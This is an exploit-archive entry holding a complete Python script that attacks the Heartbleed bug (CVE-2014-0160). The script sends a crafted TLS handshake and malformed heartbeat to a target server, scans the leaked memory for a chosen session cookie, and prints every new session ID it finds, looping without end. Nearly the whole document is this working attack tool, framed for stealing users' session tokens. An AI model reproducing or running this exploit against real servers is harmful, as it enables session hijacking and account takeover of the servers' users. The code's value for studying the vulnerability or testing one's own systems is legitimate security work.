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Heartbleed User Session Extraction Exploit
Security Risk Medium
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#!/usr/bin/python # Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions. # Michael Davis (mike.philip.davis@gmail.com) # Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import select import sys import string import struct import socket import time from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-c', '--cookie', type='str', default='session', help='Cookie to look for. (default: session)') def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') hb = h2bin(''' 18 03 02 00 03 01 40 00 ''') class HeartBleeder(object): server_response = None socket = None hostname = '' port = 443 found_sessions = set() cookie = 'session' cookie_length = 56 def __init__(self, hostname='', cookie=''): self.hostname = hostname self.cookie = cookie def connect(self): """ Connects to the remote server. """ self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sys.stdout.flush() self.socket.connect((self.hostname, self.port)) sys.stdout.flush() self.socket.send(hello) sys.stdout.flush() def rcv_response(self): while True: _type, version, payload = self.rcv_message() if _type is None: print 'Server closed connection without sending Server Hello.' return # Look for server hello done message. if _type == 22 and ord(payload[0]) == 0x0E: break def rcv_message(self): record_header = self.rcv_all(5) if record_header is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None _type, version, line = struct.unpack('>BHH', record_header) payload = self.rcv_all(line, 10) if payload is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None # print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return _type, version, payload def rcv_all(self, length, timeout=5): endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([self.socket], [], [], 5) if self.socket in r: data = self.socket.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata def try_heartbeat(self): self.socket.send(hb) while True: _type, version, self.payload = self.rcv_message() if _type is None: print 'No heartbeat response received, server likely not vulnerable' return False if _type == 24: # print 'Received heartbeat response:' self.parse_response() if len(self.payload) > 3: pass # print 'WARNING: server returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return True if _type == 21: print 'Received alert:' self.hexdump(self.payload) print 'Server returned error, likely not vulnerable' return False def parse_response(self): """ Parses the response from the server for a session id. """ ascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload) index = string.find(ascii, self.cookie) if index >= 0: info = ascii[index:index + self.cookie_length] session = info.split(' ')[0] session = string.replace(session, ';', '') if session not in self.found_sessions: self.found_sessions.add(session) print session def hexdump(self, payload): """ Prints out a hexdump in the event that server returns an error. """ for b in xrange(0, len(payload), 16): line = [c for c in payload[b:b + 16]] hxdat = ' '.join('%02X' % ord(c) for c in line) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in line) print ' %04x: %-48s %s' % (b, hxdat, pdat) print def scan(self): self.connect() self.rcv_response() self.try_heartbeat() def main(): opts, args = options.parse_args() if len(args) < 1: options.print_help() return cookies_str = 'session' if len(args) > 1: cookies_str = args[1] print cookies_str while True: heartbeat = HeartBleeder(hostname=args[0], cookie=cookies_str) heartbeat.scan() if __name__ == '__main__': main() # 0day.today [2024-11-16] #